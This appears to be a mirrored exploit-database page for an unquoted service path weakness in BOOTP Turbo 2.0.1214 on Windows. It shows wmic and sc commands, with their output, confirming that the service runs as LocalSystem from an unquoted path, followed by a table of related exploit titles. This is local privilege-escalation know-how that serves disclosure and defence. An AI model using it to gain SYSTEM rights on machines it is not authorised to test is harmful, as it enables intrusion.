Menu
Author
boku
Platform
windows
Release date
2020-02-17
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | # Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: 2.0.1214
# Tested On: Windows 10 (32-bit)
C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """
BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto
C:\Users\user>sc qc "BOOTP Turbo"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BOOTP Turbo
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BOOTP Turbo
DEPENDENCIES : Nsi
: Afd
: NetBT
: Tcpip
SERVICE_START_NAME : LocalSystem
|
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-05-26 | "StreamRipper32 2.6 - Buffer Overflow (PoC)" | local | windows | "Andy Bowden" |
| 2020-05-25 | "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" | remote | windows | Metasploit |
| 2020-05-25 | "GoldWave - Buffer Overflow (SEH Unicode)" | local | windows | "Andy Bowden" |
| 2020-05-22 | "VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)" | local | windows | Gobinathan |
| 2020-05-22 | "Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)" | dos | windows | Socket_0x03 |
| 2020-05-22 | "Filetto 1.0 - 'FEAT' Denial of Service (PoC)" | dos | windows | Socket_0x03 |
| 2020-05-22 | "Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)" | dos | windows | Socket_0x03 |
| 2020-05-22 | "Druva inSync Windows Client 6.6.3 - Local Privilege Escalation" | local | windows | "Matteo Malvica" |
| 2020-05-21 | "CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)" | local | windows | "Xenofon Vassilakopoulos" |
| 2020-05-21 | "AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)" | dos | windows | "Xenofon Vassilakopoulos" |
import requestsresponse = requests.get('https://www.nmmapper.com/api/exploitdetails/48078/?format=json')For full documentation follow the link above